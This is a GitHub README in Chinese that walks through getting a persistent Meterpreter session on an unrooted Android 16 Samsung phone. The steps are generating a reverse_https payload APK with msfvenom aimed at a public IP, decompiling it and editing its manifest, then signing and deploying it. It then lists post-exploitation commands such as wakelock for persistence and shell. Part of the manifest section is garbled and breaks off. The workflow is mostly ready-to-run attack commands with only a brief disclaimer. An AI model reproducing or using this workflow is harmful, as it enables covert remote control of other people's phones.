K4N3CO-LABS/Working-Meterpreter-Session-on-Android-16
GitHub: K4N3CO-LABS/Working-Meterpreter-Session-on-Android-16
该仓库记录了在未 Root 的 Android 16 三星设备上实现 Meterpreter 持久化会话的完整渗透测试工作流,包括 APK 注入、重编译、签名与部署。
Stars: 5 | Forks: 0
# Android 16 - 三星手机上的无阶段 Meterpreter 会话(无 Root,2026):
[](https://postimg.cc/n9pwYqZT)
# Android 渗透测试工作流:APK 修改与本地部署指南:
## 关于
本仓库**记录**了将 **Metasploit payload** 注入到 **Android 应用程序包 (APK)** 中,修改 manifest 以允许**显式执行**,对二进制文件进行**加密签名**,并通过 ADB 本地**部署**以进行**安全测试**的**技术过程**。
## 前置条件
**确保**你已**安装以下工具**并在你的**系统路径**中**可用**,并在你的 **Wi-Fi 路由器**上设置了**端口转发**:
* **Wi-Fi 路由器端口转发已激活** *(`转发到你电脑的本地 IP [192.168...]`)*
* **Metasploit Framework** *(`msfvenom`, `msfconsole`)*
* **Apktool**
* **Zipalign**
* **Java Development Kit** *(`keytool`, `apksigner`)*
* **Android Debug Bridge** *(`adb`)*
## 步骤 1:Payload 生成
通过**定位**到**本地机器接口**来**生成 payload**。这在**本地调试**期间会完全**绕过**网络域名解析。*`确保在 msfvenom 和 msfconsole 的 payload 设置中,对无阶段模式 ( stageless ) 使用 / ( meterpreter/reverse_https )。`*
```
msfvenom -p android/meterpreter/reverse_https LHOST=[YOUR PUBLIC IP] LPORT=443 -o payload_example.apk
```
## 步骤 2:Manifest 修改
**反编译**二进制包以**修改其配置**,然后**重新编译**以确保**结构完整性**。
### 1. 反编译 APK
```
apktool d payload_example.apk -o example_folder
```
### 2. 修改 Manifest
```
cd example_folder
```
```
nano AndroidManifest.xml
```
```
# 将所有这些添加到 AndroidManifest.xml 的开头
```
```
# 将底部的
```
```
# 并确保这在 [ YOUR LOCAL IP:49152)`
**meterpreter >**
**一旦会话开始:**
```
# 查看可用命令 meterpreter >
help
```
```
# 用于持久化 meterpreter >
wakelock
```
```
# 打开应用 shell
shell
```
```
# 返回 msf exploit(multi/handler) > 而不终止会话
background
```
**一旦转入后台:**
```
# 列出会话 - msf exploit(multi/handler) >
sessions -l
```
```
# 终止特定会话 - msf exploit(multi/handler) >
sessions -k 1,2,3
```
```
# 终止所有会话 - msf exploit(multi/handler) >
sessions -K
```
```
# 打开/重新打开会话 - msf exploit(multi/handler) >
sessions -i 1
```
```
# 延长会话的超时时间(将 interact # 更改为会话编号,并将 timeout 更改为你想要的时间) - msf exploit(multi/handler) >
sessions --interact 1 --timeout 120
```
### 砰!!!
你已经成功开启了**无阶段 ( stageless ) meterpreter** 会话!
### ⭐ 支持该项目
如果你觉得本指南**有用**,请考虑给项目点个**Star** ⭐ —— 这对**帮助**很大!
随时欢迎**提交贡献**!
**免责声明:**本指南仅供**教育**和**授权**的安全测试目的使用。祝你使用愉快**!
标签:Android安全, APK注入, 目录枚举, 移动安全, 足迹探测